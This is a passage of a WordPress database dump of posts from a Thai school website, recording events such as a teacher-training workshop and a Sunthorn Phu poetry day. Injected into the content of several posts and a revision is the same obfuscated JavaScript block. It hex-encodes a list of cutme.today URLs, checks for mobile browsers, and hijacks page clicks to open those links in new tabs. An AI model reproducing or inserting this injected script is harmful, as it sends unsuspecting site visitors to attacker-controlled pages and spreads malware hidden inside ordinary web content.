x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-29','','','2024-08-01 20:53:55','2024-08-01 13:53:55','',0,'http://pakhaeng.ssk.in.th/?p=438',0,'post','',0),
(439,1,'2024-08-01 20:53:39','2024-08-01 13:53:39','','23-67','','inherit','','closed','','23-67','','','2024-08-01 20:53:39','2024-08-01 13:53:39','',438,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/23-67.png',0,'attachment','image/png',0),
(440,1,'2024-08-01 20:53:53','2024-08-01 13:53:53','<!-- wp:paragraph -->\n<p><strong></strong><strong>เมื่อวันที่ 14 มิถุนายน พ.ศ.2567 นางเสน่หา</strong><strong> </strong><strong>พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ และคณะครูร่วมเป็นวิทยากร โครงการอบรมขยายผลเชิงปฏิบัติการการจัดการเรียนรวม (SET) การพัฒนาและเสริมสร้างศักยภาพผู้เรียนที่มีความสามารถพิเศษบนฐานพหุปัญญา (MI) การอบรมเพื่อพัฒนาและเสริมสร้างศักยภาพผู้เรียนตามความแตกต่างระหว่างบุคคล (DI) ณ โรงเรียนบ้านดินดำเหล่าเสนไต้</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong></strong><strong>โดยมีนางปุณิกา</strong><strong> </strong><strong>ธรรมนูญ รองฯผอ.สพป.ศรีสะเกษ เขต 1 เป็นประธานเปิดการอบรมในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":439,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/23-67-724x1024.png\" alt=\"\" class=\"wp-image-439\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','438-revision-v1','','','2024-08-01 20:53:53','2024-08-01 13:53:53','',438,'http://pakhaeng.ssk.in.th/?p=440',0,'revision','',0),
(441,1,'2024-08-01 20:55:00','2024-08-01 13:55:00','<!-- wp:paragraph -->\n<p><strong></strong><strong>วันที่ 26 เดือนมิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันสุนทรภู่ กวีเอกของโลก เพื่อเป็นการส่งเสริมให้นักเรียนได้ร่วมกันรำลึกถึงเกียรติคุณของท่านสุนทรภู่ และยกย่องเชิดชู ท่านสุนทรภู่ ตลอดจนเป็นการส่งเสริมบทกวี และวรรณกรรม ซึ่งเป็นผลงานของท่านสุนทรภู่ ให้เยาวชนได้ร่วมกันสืบทอด</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ณ ใต้ถุนอาคารเรียนหลังเรียนหลังใหม่ โดยมี นายภูมิชัย</strong><strong> </strong><strong>มามะนี นายกองค์การบริหารส่วนตำบลโพธิ์ เป็นประธานในพิธี กิจกรรมประกอบไปด้วยกิจกรรม การแต่งกายเป็นตัวละครในวรรณคดี การประกวดแต่งกลอน การแข่งขันวาดภาพระบายสี ฯลฯ โดยกิจกรรมต่างๆ ประสบความสำเร็จลุล่วงไปได้ด้วยดี</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/24-67-724x1024.png\" alt=\"\" class=\"wp-image-442\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 